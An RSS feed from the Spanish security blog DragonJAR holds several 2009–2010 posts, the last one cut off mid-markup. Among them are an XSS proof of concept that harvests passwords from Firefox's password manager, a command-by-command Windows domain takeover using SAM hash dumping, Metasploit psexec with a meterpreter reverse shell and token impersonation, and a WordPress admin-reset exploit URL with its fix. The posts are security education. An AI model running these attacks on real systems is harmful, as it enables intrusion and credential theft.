<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>La Comunidad DragonJAR &#187; Administrador</title>
	<atom:link href="http://www.dragonjar.org/tag/administrador/feed" rel="self" type="application/rss+xml" />
	<link>http://www.dragonjar.org</link>
	<description>Noticias de actualidad y seguridad informática, herramientas de seguridad, documentación y una excelente COMUNIDAD.</description>
	<lastBuildDate>Wed, 17 Mar 2010 06:22:04 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Robando claves por XSS del Administrador de Contraseñas del Firefox</title>
		<link>http://www.dragonjar.org/robando-claves-por-xss-del-administrador-de-contrasenas-del-firefox.xhtml</link>
		<comments>http://www.dragonjar.org/robando-claves-por-xss-del-administrador-de-contrasenas-del-firefox.xhtml#comments</comments>
		<pubDate>Tue, 16 Mar 2010 06:51:50 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Seguridad Web]]></category>
		<category><![CDATA[Administrador]]></category>
		<category><![CDATA[Clave]]></category>
		<category><![CDATA[Contrasena]]></category>
		<category><![CDATA[Contraseñas]]></category>
		<category><![CDATA[Inyección]]></category>
		<category><![CDATA[Mozilla Firefox]]></category>
		<category><![CDATA[NoScript]]></category>
		<category><![CDATA[Password]]></category>
		<category><![CDATA[Passwords]]></category>
		<category><![CDATA[Robar]]></category>
		<category><![CDATA[Robo]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=4045</guid>
		<description><![CDATA[Gracias a un mensaje de Tom Brennan, me entero de un problema en el Administrador de Contraseñas del Mozilla Firefox, que permite a un atacante mediante XSS (Cross-site scripting) obtener la clave de un usuario almacenada en el navegador.

El problema se encuentra en que el administrador de contraseñas del Mozilla Firefox , no valida adecuadamente [...]]]></description>
			<content:encoded><![CDATA[<p>Gracias a un mensaje de <a rel="nofollow" target="_blank" href="http://twitter.com/brennantom/status/10554441500">Tom Brennan</a>, me entero de un problema en el Administrador de Contraseñas del Mozilla Firefox, que permite a un atacante mediante XSS (<a rel="nofollow" target="_blank" href="http://es.wikipedia.org/wiki/Cross-site_scripting">Cross-site scripting</a>) obtener la clave de un usuario almacenada en el navegador.</p>
<p style="text-align: center;"><img class="alignnone" title="XSS Robo de claves" src="http://farm5.static.flickr.com/4069/4436827535_c045e2fae3.jpg" alt="4436827535 c045e2fae3 Robando claves por XSS del Administrador de Contraseñas del Firefox" width="500" height="325" /></p>
<p>El problema se encuentra en que el administrador de contraseñas del Mozilla Firefox , no valida adecuadamente el formulario desde el cual se guarda la clave en el administrador de contraseñas, por lo tanto si a la pagina donde se encuentra el formulario de logueo se le puede realizar un XSS es posible agregar un formulario con un campo oculto del tipo &#8220;password&#8221; y al acceder a ella, firefox no solo llenara el formulario real de acceso automáticamente, sino también el formulario oculto que acabamos de inyectar.<span id="more-4045"></span></p>
<p style="text-align: center;"><img class="alignnone" title="Robar contraseñas firefox" src="http://farm5.static.flickr.com/4049/4436827733_71f2f3e6d4.jpg" alt="4436827733 71f2f3e6d4 Robando claves por XSS del Administrador de Contraseñas del Firefox" width="498" height="111" /></p>
<p>Si le echamos un vistoso al formulario utilizando el plugin <a rel="nofollow" target="_blank" href="http://chrispederick.com/work/web-developer/">Web Developer</a> para el Mozilla Firefox, encontramos que efectivamente el Administrador de Contraseñas, nos llenó el formulario oculto que colocamos en la pagina mediante XSS con nuestra clave de acceso:</p>
<p style="text-align: center;"><img class="alignnone" title="Robar contraseñas" src="http://farm3.static.flickr.com/2736/4437603194_2c7c33f317_o.jpg" alt="4437603194 2c7c33f317 o Robando claves por XSS del Administrador de Contraseñas del Firefox" width="500" height="351" /></p>
<p>El código utilizado para robar la información del Administrador de contraseñas en el Mozilla Firefox:</p>
<blockquote><p><code>&lt;script&gt; document.write('&lt;form&gt;&lt;input id=p type=password style=visibility:hidden&gt;&lt;/form&gt;'); setTimeout('alert("Password: " + document.getElementById("p").value)', 100); &lt;/script&gt;</code></p></blockquote>
<p>Podemos modificar el formulario para que nos envié la contraseña capturada a un archivo en el que puede ser almacenada o enviada por correo electrónico, pero en esta prueba de concepto no lo realizaremos.</p>
<p>En este caso contar con &#8220;clave maestra&#8221; en el administrador de contraseñas del Mozilla Firefox no supone una &#8220;barrera&#8221; para que obtengan nuestras claves, ya que una vez ingresada la clave maestra, el Firefox llenara de todas formas el formulario con nuestra clave.</p>
<p>Aunque posiblemente una técnica similar pueda funcionar en otros navegadores, he realizado pruebas en Google Chrome, Safari y Opera siendo el Mozilla Firefox el único afectado.</p>
<p><strong>Actualización:</strong><br />
Un fallo similar fue <a rel="nofollow" target="_blank" href="https://bugzilla.mozilla.org/show_bug.cgi?id=359675">reportado en el 2006 y supuestamente fue resuelto &#8220;VERIFIED FIXED&#8221;,</a> pero acabo de probar con <a rel="nofollow" target="_blank" href="http://www.oftedal.no/~erlend/test/">la prueba de concepto que publicaron en esa ocasión</a> y sigue siendo vulnerable.</p>
<h2>Recomendaciones:</h2>
<ul>
<li>Escribe &#8220;about:config&#8221; en la barra del Firefox para desactivar (poner en &#8220;false&#8221;) la función signon.autofillForms</li>
<p><img class="alignnone" title="Deshabilitar auto llenado firefox" src="http://farm3.static.flickr.com/2721/4440250942_f1df42de73.jpg" alt="4440250942 f1df42de73 Robando claves por XSS del Administrador de Contraseñas del Firefox" width="500" height="130" /></p>
<p>Con esto deshabilitas la función de auto llenado del administrador de contraseñas y evitarnos ser victimas de este fallo.</p>
<li>Utilizar el plugin <a rel="nofollow" target="_blank" title="Enlace permanente a NoScript" rel="bookmark" href="../noscript.xhtml">NoScript</a> (si no hay inyección de código, no hay problema)</li>
<li>No utilizar el Administrador de Contraseñas de Mozilla Firefox (<a rel="nofollow" target="_blank" href="http://www.dragonjar.org/recupera-contrasenas-almacenadas-en-tu-navegador.xhtml">ya hemos demostrado que no es recomendable, ni en firefox, ni en ningún navegador</a>), en vez de el <a href="http://lastpass.com/">utilizar servicios gratuitos como LastPass</a> (al que por cierto le debo un articulo entero)</li>
</ul>
<p><strong>Mas Información:</strong><br />
<a rel="nofollow" target="_blank" href="http://ha.ckers.org/weird/xss-password-manager.html">XSS demo for stealing passwords from the Firefox password manager</a></p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/como-recuperar-una-cuenta-de-facebook.xhtml" title="¿Cómo Recuperar una Cuenta de Facebook?">¿Cómo Recuperar una Cuenta de Facebook?</a></li><li><a href="http://www.dragonjar.org/resetear-password-de-root.xhtml" title="Resetear Password de Root">Resetear Password de Root</a></li><li><a href="http://www.dragonjar.org/como-recuperar-clave-mysql.xhtml" title="Como Recuperar Clave MySQL">Como Recuperar Clave MySQL</a></li><li><a href="http://www.dragonjar.org/diccionarios-para-realizar-ataques-de-fuerza-bruta.xhtml" title="Listado de Diccionarios para Realizar Ataques de Fuerza Bruta">Listado de Diccionarios para Realizar Ataques de Fuerza Bruta</a></li><li><a href="http://www.dragonjar.org/1234-y-password-son-las-contrasenas-utilizadas-en-usa.xhtml" title="&#8220;1234&#8243; y &#8220;password&#8221; son las Contraseñas + Utilizadas en USA">&#8220;1234&#8243; y &#8220;password&#8221; son las Contraseñas + Utilizadas en USA</a></li><li><a href="http://www.dragonjar.org/malas-contrasenas-para-utilizar.xhtml" title="Las Peores 500 Contraseñas de Todos los Tiempos">Las Peores 500 Contraseñas de Todos los Tiempos</a></li><li><a href="http://www.dragonjar.org/passpub-generador-de-contrasenas-seguras.xhtml" title="PassPub, Generador de Contraseñas Seguras ">PassPub, Generador de Contraseñas Seguras </a></li><li><a href="http://www.dragonjar.org/maneja-tus-contrasenas-de-forma-sencilla.xhtml" title="Maneja tus Contraseñas de Forma Sencilla ">Maneja tus Contraseñas de Forma Sencilla </a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/robando-claves-por-xss-del-administrador-de-contrasenas-del-firefox.xhtml/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>¿Cómo tomar control de un Dominio en Windows?</title>
		<link>http://www.dragonjar.org/como-tomar-control-dominio-windows.xhtml</link>
		<comments>http://www.dragonjar.org/como-tomar-control-dominio-windows.xhtml#comments</comments>
		<pubDate>Wed, 17 Feb 2010 20:07:39 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Documentacion]]></category>
		<category><![CDATA[Administrador]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Contraseñas]]></category>
		<category><![CDATA[Dominios]]></category>
		<category><![CDATA[Metasploit]]></category>
		<category><![CDATA[meterpreter]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3886</guid>
		<description><![CDATA[Los &#8220;dominios&#8221; en windows, facilitan muchas de las tareas a la hora de administrar una red, ya que permite realizar     una agrupación lógica de servidores de red y otros ordenadores, para compartir  información común sobre cuentas  y seguridad, pero es una practica muy común (aunque poco recomendada) que los administradores de [...]]]></description>
			<content:encoded><![CDATA[<p>Los &#8220;dominios&#8221; en windows, facilitan muchas de las tareas a la hora de administrar una red, ya que permite realizar     una agrupación lógica de servidores de red y otros ordenadores, para compartir  información común sobre cuentas  y seguridad, pero es una practica muy común (aunque poco recomendada) que los administradores de estos dominios reutilicen la clave que usan para el usuario administrador de un equipo en los dominios de windows.</p>
<p style="text-align: center;"><img class="alignnone" title="hackear dominio en windows" src="http://img517.imageshack.us/img517/3070/dominio.jpg" alt="dominio ¿Cómo tomar control de un Dominio en Windows?" width="502" height="425" /></p>
<p>En el siguiente video vamos a ver como  tomar el control de un dominio en windows, cuando se presenta el caso de Reutilización de contraseñas comentado anteriormente:<span id="more-3886"></span></p>
<p>REQUISITOS</p>
<ul>
<li>Tener acceso a una maquina miembro del dominio (para sacar el hash del usuario)</li>
<li>Todos los usuarios &#8220;administrador&#8221; de las maquinas miembros del dominio tienen la misma clave</li>
<li>Conocer la ip desde la que se loguea el administrador del dominio (puedes conseguirla de muchas formas, una de ellas es la ing. social)</li>
<li>Una copia de <a rel="nofollow" target="_blank" href="../http://www.dragonjar.org/backtrack-4-final.xhtml">BackTrack 4</a></li>
</ul>
<p>Teniendo los requisitos listo, pasamos a realizar los pasos para tomar el control de un dominio en Windows:</p>
<p style="text-align: center;"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="344" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowScriptAccess" value="always" /><param name="src" value="http://www.youtube.com/v/fIQQD193Hvc&amp;color1=0xb1b1b1&amp;color2=0xcfcfcf&amp;hl=en_US&amp;feature=player_embedded&amp;fs=1" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="425" height="344" src="http://www.youtube.com/v/fIQQD193Hvc&amp;color1=0xb1b1b1&amp;color2=0xcfcfcf&amp;hl=en_US&amp;feature=player_embedded&amp;fs=1" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p>Como vemos, fácilmente hemos agregado un usuario administrador a la lista de &#8220;administradores de dominio&#8221; simplemente siguiendo estos pasos:</p>
<ul>
<li><strong>mount /dev/sda1 /mnt/sda1</strong><br />
Montamos la particion de la maquina windows</li>
<li><strong>cd /mnt/sda1/WINDOWS/system32/config</strong><br />
accedemos a la carpeta dodne se encuentra el archivo SAM</li>
<li><strong>samdump2 system SAM</strong><br />
sacamos los hash de los usuarios en la maquina windows</li>
<li><strong>msfconsole</strong><br />
ejecutamos el metasploit por consola</li>
<li><strong>use windows/smb/psexec</strong><br />
utilizamos el psexec</li>
<li><strong>exploit -p windows/meterpreter/reverse_tcp -o</strong><br />
utilizamos la shell meterpreter</li>
<li><strong>LHOST=192.168.1.160,LPORT=6789,RHOST=192.168.1.23,SMBUser=Administrator,SMBPass=  123&#8230;:5654&#8230; -j</strong><br />
configuramos las opciones del exploit</li>
<li><strong>sessions -i 1</strong><br />
una vez aparezca exitoso el ataque lanzamos la sesión donde se encuentra</li>
<li><strong>use incognito</strong><br />
utilizamos el modulo incognito de meterpreter</li>
<li><strong>list_tokens -u</strong><br />
mostramos los tokens</li>
<li><strong>impersonate_token mydomain\\domainadmin</strong><br />
tomamos las credenciales del administrador de dominio</li>
<li><strong>execute -f cmd.exe -i -t</strong><br />
lanzamos la consola de windows</li>
<li><strong>net user hack MPass5678 /add /domain</strong><br />
Agregamos el usuario &#8220;hack&#8221; con clave &#8220;MPass46782&#8243; al dominio</li>
<li><strong>net group &#8220;Domain Admins&#8221; hack /add /domain</strong><br />
metemos el usuario hack al grupo de administradores de dominio</li>
<li>Ya hemos tomado el control del dominio de windows</li>
</ul>
<p>Este ataque es compatible con  WinXP/Vista/Win7/Windows Server2k3/Windows  Server 2k7 y muestra lo sensible que es reutilizar las contraseñas en nuestro sistema, sin importar que tan &#8220;complejas&#8221; sean.</p>
<p>PD. en <a rel="nofollow" target="_blank" href="http://securitytube.net/How-to-own-a-Windows-Domain-video.aspx">Securitytube.net existe un vídeo en el que realizan este mismo procedimiento</a> un poco mas &#8220;a mano&#8221; pero que puede servirnos también en nuestro proceso de aprendizaje.</p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/bypass-con-metasploit-atacando-a-nuestro-objetivo-desde-una-maquina-ya-comprometida.xhtml" title="Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida">Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida</a></li><li><a href="http://www.dragonjar.org/katana-multiples-distribuciones-de-seguridad-en-tu-usb.xhtml" title="Katana &#8211; Múltiples Distribuciones de Seguridad en tu USB">Katana &#8211; Múltiples Distribuciones de Seguridad en tu USB</a></li><li><a href="http://www.dragonjar.org/robando-claves-por-xss-del-administrador-de-contrasenas-del-firefox.xhtml" title="Robando claves por XSS del Administrador de Contraseñas del Firefox">Robando claves por XSS del Administrador de Contraseñas del Firefox</a></li><li><a href="http://www.dragonjar.org/como-realizar-un-borrado-seguro-usando-bleachbit.xhtml" title="Como realizar un borrado seguro usando BleachBit">Como realizar un borrado seguro usando BleachBit</a></li><li><a href="http://www.dragonjar.org/video-explotando-wm-downloader.xhtml" title="Video: Explotando WM Downloader ">Video: Explotando WM Downloader </a></li><li><a href="http://www.dragonjar.org/como-recuperar-clave-mysql.xhtml" title="Como Recuperar Clave MySQL">Como Recuperar Clave MySQL</a></li><li><a href="http://www.dragonjar.org/video-introduccion-al-metasploit-framework-2.xhtml" title="Vídeo: Introducción al Metasploit Framework">Vídeo: Introducción al Metasploit Framework</a></li><li><a href="http://www.dragonjar.org/metasploit-framework.xhtml" title="Metasploit Framework 3.3.2">Metasploit Framework 3.3.2</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/como-tomar-control-dominio-windows.xhtml/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Process Hacker, Mata Procesos en Windows</title>
		<link>http://www.dragonjar.org/process-hacker-mata-procesos-en-windows.xhtml</link>
		<comments>http://www.dragonjar.org/process-hacker-mata-procesos-en-windows.xhtml#comments</comments>
		<pubDate>Sat, 26 Sep 2009 00:25:54 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Noticias Software]]></category>
		<category><![CDATA[Administrador]]></category>
		<category><![CDATA[aplicaciones]]></category>
		<category><![CDATA[Hacker]]></category>
		<category><![CDATA[Matar]]></category>
		<category><![CDATA[Memoria]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Open Source]]></category>
		<category><![CDATA[Processos]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3133</guid>
		<description><![CDATA[Process Hacker es un administrador de procesos para windows, totalmente libre y open source, algo así como un &#8220;administrador de tareas&#8221; con esteroídes, ya que permite ver procesos ocultos, editar la memoria del sistema, matar procesos que el &#8220;administrador de tareas&#8221; de windows no permite entre otras funciones muy útiles.

Existen muchos programas de este tipo, [...]]]></description>
			<content:encoded><![CDATA[<p>Process Hacker es un administrador de procesos para windows, totalmente libre y open source, algo así como un &#8220;administrador de tareas&#8221; con esteroídes, ya que permite ver procesos ocultos, editar la memoria del sistema, matar procesos que el &#8220;administrador de tareas&#8221; de windows no permite entre otras funciones muy útiles.</p>
<p style="text-align: center;"><img class="alignnone" src="http://farm3.static.flickr.com/2615/3963722573_bf73d04029_o.jpg" alt="3963722573 bf73d04029 o Process Hacker, Mata Procesos en Windows" width="444" height="287" title="Process Hacker, Mata Procesos en Windows" /></p>
<p>Existen muchos programas de este tipo, uno de los mas populares es el <a rel="nofollow" target="_blank" href="http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx">Process Explorer</a> de la empresa sysinternals que fue comprada por Microsoft, precisamente por esa compra process explorer ha perdido adeptos (aunque no calidad) y muchos han optado por alternativas totalmente libres como Process Hacker.<span id="more-3133"></span></p>
<p>A diferencia de otros administradores de tareas, Process Hacker cuenta con su propio drivers para manejar los procesos del sistema, lo que le permite matar procesos incluso si estos están siendo utilizados por el sistema operativo u otras aplicaciones, esta funcionalidad también le permite ver procesos que pueden estar ocultos al &#8220;administrador de tareas&#8221; de windows, pero no solo podemos ver y eliminar procesos, también podemos realizar las mismas tareas con los servicios del sistema, podemos ver que aplicaciones están haciendo uso de nuestra conexión y con quien se están comunicando.</p>
<p>Sólo funciona en Windows XP o superior de 32 bits y requiere del .NET Framework 2.0. En las versiones de 64 bits su funcionalidad se ve enormemente reducida a causa de que sólo son permitidos drivers firmados con un certificado digital válido emitido por una entidad de confianza, por lo que si deseamos poder cargar el driver de Process Hacker deberemos deshabilitar esta característica que viene por defecto en los sistemas de 64 bits.</p>
<p style="text-align: center;"><a rel="nofollow" target="_blank" href="http://sourceforge.net/projects/processhacker/files/processhacker/">Descargar Process Hacker, excelente administrador de Procesos en Microsoft Windows</a></p>
<p><strong>Para Mas Información:</strong><br />
<a rel="nofollow" target="_blank" href="http://processhacker.sourceforge.net/">Pagina Oficial del Process Hacker</a><br />
<a rel="nofollow" target="_blank" href="http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx">Pagina Oficial del Process Explorer</a></p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/la-anti-tesis-del-cofee.xhtml" title="Herramienta Anti Forense para Windows">Herramienta Anti Forense para Windows</a></li><li><a href="http://www.dragonjar.org/denegacion-de-servicio-desde-el-wordpad.xhtml" title="Denegacion de Servicio desde el WordPad">Denegacion de Servicio desde el WordPad</a></li><li><a href="http://www.dragonjar.org/wude-3-0.xhtml" title="WUDE 3.0">WUDE 3.0</a></li><li><a href="http://www.dragonjar.org/actualiza-tu-equipo-con-windows.xhtml" title="Actualiza tu equipo con Windows">Actualiza tu equipo con Windows</a></li><li><a href="http://www.dragonjar.org/actualiza-tu-software-con-secunia-personal-software-inspector.xhtml" title="Actualiza tu software con Secunia Personal Software Inspector ">Actualiza tu software con Secunia Personal Software Inspector </a></li><li><a href="http://www.dragonjar.org/como-tomar-control-dominio-windows.xhtml" title="¿Cómo tomar control de un Dominio en Windows?">¿Cómo tomar control de un Dominio en Windows?</a></li><li><a href="http://www.dragonjar.org/como-realizar-un-borrado-seguro-usando-bleachbit.xhtml" title="Como realizar un borrado seguro usando BleachBit">Como realizar un borrado seguro usando BleachBit</a></li><li><a href="http://www.dragonjar.org/vulnerabilidad-0-day-todos-los-windows.xhtml" title="Vulnerabilidad 0-day en todas las versiones de Windows">Vulnerabilidad 0-day en todas las versiones de Windows</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/process-hacker-mata-procesos-en-windows.xhtml/feed</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Reseteo Remoto del Password de Admin en WordPress</title>
		<link>http://www.dragonjar.org/reseteo-remoto-del-password-de-admin-en-wordpress.xhtml</link>
		<comments>http://www.dragonjar.org/reseteo-remoto-del-password-de-admin-en-wordpress.xhtml#comments</comments>
		<pubDate>Wed, 12 Aug 2009 04:36:49 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Noticias Seguridad]]></category>
		<category><![CDATA[Administrador]]></category>
		<category><![CDATA[Password]]></category>
		<category><![CDATA[Vulnerabilidad]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=2948</guid>
		<description><![CDATA[No se que pasa con WordPress últimamente, el investigador Francés “Laurent Gaffié” acaba de publicar  un full-disclosure en el que explica una nueva vulnerabilidad en la ultima versión de WordPress 2.8.3.

Esta nueva vulnerabilidad permite a un visitante mal intencionado resetar el password de administrador de un administrador impidiendo el acceso del mismo a su [...]]]></description>
			<content:encoded><![CDATA[<p>No se que pasa con WordPress últimamente, el investigador Francés “<a rel="nofollow" target="_blank" href="http://lists.grok.org.uk/pipermail/full-disclosure/2009-August/070139.html" target="_blank">Laurent Gaffié</a>” acaba de publicar  un <a rel="nofollow" target="_blank" href="http://lists.grok.org.uk/pipermail/full-disclosure/2009-August/070139.html">full-disclosure</a> en el que explica una nueva vulnerabilidad en la ultima versión de WordPress 2.8.3.</p>
<p style="text-align: center;"><img title="XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2" src="http://img241.imageshack.us/img241/6261/wordpressbug.jpg" alt="WordPress 2.8.2 en Español" /></p>
<p>Esta nueva vulnerabilidad permite a un visitante mal intencionado resetar el password de administrador de un administrador impidiendo el acceso del mismo a su propio panel de administración, el error se encuentra en el archivo wp-login.php que no valida adecuadamente.<span id="more-2948"></span><br />
Un visitante mal intencionado puede resetear el password de administrador con solo visitar un enlace como el siguiente:</p>
<pre><a rel="nofollow" target="_blank" href="http://PAGINAAQUI.COM/wp-login.php?action=rp&amp;key=o7naCKN3OoeU2KJMMsag">http://PAGINAAQUI.COM/wp-login.php?action=rp&amp;key=o7naCKN3OoeU2KJMMsag</a></pre>
<p>La buena noticia es que igual de fácil a su explotación es su solución, basta con buscar en el archivo wp-login.php el código:</p>
<p><code>if ( empty( $key ) )</code></p>
<p>y remplazarlo por:</p>
<p><code>if ( empty( $key ) || is_array( $key ) )</code></p>
<p>Aunque como siempre es recomendable que actualices tu versión a la <a rel="nofollow" target="_blank" href="http://wordpress.org/download/" target="_blank">WordPress a la 2.8.4</a> aun no sale oficialmente en <a rel="nofollow" target="_blank" title="español" href="../tag/espanol">español</a>, pero puedes utilizar este <a rel="nofollow" target="_blank" href="http://es-wordpress.googlecode.com/files/wp-2.8.3-es_ES.zip">paquete de idiomas para traducirlo</a>.</p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/wordpress-263-vulnerable-a-xss.xhtml" title="WordPress 2.6.3 vulnerable a Cross Site Scripting">WordPress 2.6.3 vulnerable a Cross Site Scripting</a></li><li><a href="http://www.dragonjar.org/robando-claves-por-xss-del-administrador-de-contrasenas-del-firefox.xhtml" title="Robando claves por XSS del Administrador de Contraseñas del Firefox">Robando claves por XSS del Administrador de Contraseñas del Firefox</a></li><li><a href="http://www.dragonjar.org/xss-que-permite-postear-en-wordpress.xhtml" title="XSS que permite postear a atacante registrado en WordPress">XSS que permite postear a atacante registrado en WordPress</a></li><li><a href="http://www.dragonjar.org/xss-en-wordpress-2-8-1-actualiza-a-wordpress-2-8-2.xhtml" title="XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2">XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2</a></li><li><a href="http://www.dragonjar.org/nuevo-gusano-infecta-routers-modems-y-sistemas-gnu-linux.xhtml" title="Nuevo Gusano Infecta Routers, Modems, y Sistemas GNU Linux">Nuevo Gusano Infecta Routers, Modems, y Sistemas GNU Linux</a></li><li><a href="http://www.dragonjar.org/actualiza-a-wordpress-265.xhtml" title="Actualiza a WordPress 2.6.5">Actualiza a WordPress 2.6.5</a></li><li><a href="http://www.dragonjar.org/actualiza-a-wordpress-263.xhtml" title="Actualiza a WordPress 2.6.3">Actualiza a WordPress 2.6.3</a></li><li><a href="http://www.dragonjar.org/2-problemas-graves-que-se-solucionan-en-wordpress-262.xhtml" title="2 Problemas graves que se solucionan en WordPress 2.6.2">2 Problemas graves que se solucionan en WordPress 2.6.2</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/reseteo-remoto-del-password-de-admin-en-wordpress.xhtml/feed</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Curso de Redes en GNU Linux</title>
		<link>http://www.dragonjar.org/curso-de-redes-en-gnu-linux.xhtml</link>
		<comments>http://www.dragonjar.org/curso-de-redes-en-gnu-linux.xhtml#comments</comments>
		<pubDate>Sat, 18 Jul 2009 05:47:33 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Documentacion]]></category>
		<category><![CDATA[GNU/Linux]]></category>
		<category><![CDATA[Administrador]]></category>
		<category><![CDATA[Cursos]]></category>
		<category><![CDATA[cursos virtuales]]></category>
		<category><![CDATA[DNS]]></category>
		<category><![CDATA[Redes]]></category>
		<category><![CDATA[Servicio]]></category>
		<category><![CDATA[Software Libre]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=2799</guid>
		<description><![CDATA[Gaston Diaz parte del staff de la Revista Tux Info, me ha enviado un correo donde comparte con toda La Comunidad DragonJAR, una serie de cursos principalmente enfocados en software libre, el segundo de esta serie de cursos que comparten con nosotros es el Curso de Redes en GNU Linux.

En el curso de Redes en [...]]]></description>
			<content:encoded><![CDATA[<p>Gaston Diaz parte del staff de la <a rel="nofollow" target="_blank" href="../revista-tux-info.xhtml">Revista Tux Info</a>, me ha enviado un correo donde comparte con toda La Comunidad DragonJAR, una serie de cursos principalmente enfocados en software libre, el segundo de esta serie de cursos que comparten con nosotros es el Curso de Redes en GNU Linux.</p>
<p style="text-align: center;"><img src="http://farm3.static.flickr.com/2615/3741971040_c83df46da1.jpg" alt="Curso de Redes en Linux Gratis" title="Curso de Redes en GNU Linux" /></p>
<p>En el curso de Redes en GNU Linux, aprenderemos  a administrar correctamente una red creada con GNU Linux, a montar diferentes servicios de red y otras labores propias de un administrador de red.<span id="more-2799"></span></p>
<p>Las tematicas tratadas en el curso de redes con GNU/Linux son:</p>
<ul>
<li>Introducción</li>
<li> Usuarios del sistema Unix</li>
<li> Servidor DCHP</li>
<li> Servidor DNS</li>
<li> Entidad Certificadora</li>
<li> Servidor web Apache</li>
<li> NFS</li>
<li> Samba</li>
<li> Otros servicios</li>
<li> Copias de seguridad (Backup)</li>
<li> Servidores de Impresión</li>
<li> Servidor de terminales</li>
<li> VNC</li>
<li> OpenLDAP</li>
<li> Enrutamiento</li>
<li> Varios</li>
</ul>
<h2 style="text-align: center;"><a rel="nofollow" target="_blank" href="http://www.clasijuy.com/usljujuy/redeslinux.tar.gz" target="_blank">Descargar Gratis el Curso de Redes con GNU Linux</a></h2>
<p style="text-align: center;"><a rel="nofollow" target="_blank" href="http://www.clasijuy.com/usljujuy/redeslinux.rar" target="_blank">Mirror I</a></p>
<p><strong>Los otros cursos de esta serie:</strong></p>
<ol>
<li><a href="http://www.dragonjar.org/cursos-de-ubuntu.xhtml">Curso de Ubuntu</a></li>
<li><a href="http://www.dragonjar.org/curso-de-redes-en-gnu-linux.xhtml">Curso de Redes con GNU Linux</a></li>
<li><a href="http://www.dragonjar.org/curso-de-joomla-gratis.xhtml">Curso de Joomla Gratis</a></li>
<li><a href="http://www.dragonjar.org/curso-de-dibujo-vectorial-con-draw.xhtml">Curso de Dibujo Vectorial con OpenOffice Draw</a></li>
</ol>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/cursos-de-ubuntu.xhtml" title="Curso de Ubuntu">Curso de Ubuntu</a></li><li><a href="http://www.dragonjar.org/cursos-gratis-de-diseno-web-en-el-sena-virtual.xhtml" title="Cursos Gratis de Diseño Web en el Sena Virtual">Cursos Gratis de Diseño Web en el Sena Virtual</a></li><li><a href="http://www.dragonjar.org/curso-en-el-sena-virtual-sobre-auditoria-en-seguridad.xhtml" title="Curso en el Sena Virtual sobre Auditoria en Seguridad">Curso en el Sena Virtual sobre Auditoria en Seguridad</a></li><li><a href="http://www.dragonjar.org/comunidad-dragonjar-en-osum.xhtml" title="Comunidad DragonJAR en Open Source University Meetup – OSUM">Comunidad DragonJAR en Open Source University Meetup – OSUM</a></li><li><a href="http://www.dragonjar.org/iptraf-estadisticas-sobre-el-trafico-de-tu-red.xhtml" title="IPTraf, estadísticas sobre el tráfico de tu red">IPTraf, estadísticas sobre el tráfico de tu red</a></li><li><a href="http://www.dragonjar.org/cursos-gratuitos-de-programacion-sena-virtual.xhtml" title="Cursos Gratuitos de Programacion en el SENA VIRTUAL">Cursos Gratuitos de Programacion en el SENA VIRTUAL</a></li><li><a href="http://www.dragonjar.org/cursos-virtuales-gratis-en-el-sena.xhtml" title="Sena Virtual &#8211; Cursos virtuales GRATIS en el Sena">Sena Virtual &#8211; Cursos virtuales GRATIS en el Sena</a></li><li><a 